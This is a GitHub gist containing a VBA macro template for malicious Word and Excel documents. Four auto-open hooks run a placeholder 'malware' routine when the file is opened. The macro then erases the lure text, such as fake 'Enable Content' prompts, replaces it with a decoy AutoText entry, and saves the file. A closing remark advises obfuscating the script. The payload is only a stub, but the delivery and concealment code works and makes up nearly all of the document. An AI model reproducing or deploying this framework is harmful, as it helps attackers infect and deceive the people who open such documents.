Last active
January 17, 2022 15:59
-
-
Save mgeeky/3c705560c5041ab20c62f41e917616e6 to your computer and use it in GitHub Desktop.
This is a template for the Malicious Macros that would like to substitute primary contents of the document (like luring/fake warnings to "Enable Content") and replace document's contents with what is inside of an AutoText named `RealDoc` (configured via variable `autoTextTemplateName` ).
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Public alreadyLaunched As Integer | |
| Private Sub Malware() | |
| ' | |
| ' ============================================ | |
| ' | |
| ' Enter here your malware code here. | |
| ' It will be started on auto open surely. | |
| ' | |
| ' ============================================ | |
| MsgBox ("Here comes the malware!") | |
| ' ============================================ | |
| End Sub | |
| Private Sub Launch() | |
| If alreadyLaunched = True Then | |
| Exit Sub | |
| End If | |
| Malware | |
| SubstitutePage | |
| alreadyLaunched = True | |
| End Sub | |
| Private Sub SubstitutePage() | |
| ' | |
| ' This routine will take the entire Document's contents, | |
| ' delete them and insert in their place contents defined in | |
| ' INSERT -> Quick Parts -> AutoText -> named as in `autoTextTemplateName` | |
| ' | |
| Dim doc As Word.Document | |
| Dim firstPageRange As Range | |
| Dim rng As Range | |
| Dim autoTextTemplateName As String | |
| ' This is the name of the defined AutoText prepared in the document, | |
| ' to be inserted in place of previous contents. | |
| autoTextTemplateName = "RealDoc" | |
| Set firstPageRange = Word.ActiveDocument.Range | |
| firstPageRange.Select | |
| Selection.WholeStory | |
| Selection.Delete Unit:=wdCharacter, Count:=1 | |
| Set doc = ActiveDocument | |
| Set rng = doc.Sections(1).Range | |
| doc.AttachedTemplate.AutoTextEntries(autoTextTemplateName).Insert rng, True | |
| doc.Save | |
| End Sub | |
| Sub AutoOpen() | |
| ' Becomes launched as first on MS Word | |
| Launch | |
| End Sub | |
| Sub Document_Open() | |
| ' Becomes launched as second, another try, on MS Word | |
| Launch | |
| End Sub | |
| Sub Auto_Open() | |
| ' Becomes launched as first on MS Excel | |
| Launch | |
| End Sub | |
| Sub Workbook_Open() | |
| ' Becomes launched as second, another try, on MS Excel | |
| Launch | |
| End Sub |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
It will be a good idea to feed some Visual Basic obfuscation tool with this script (like the one of mine's: VisualBasicObfuscator).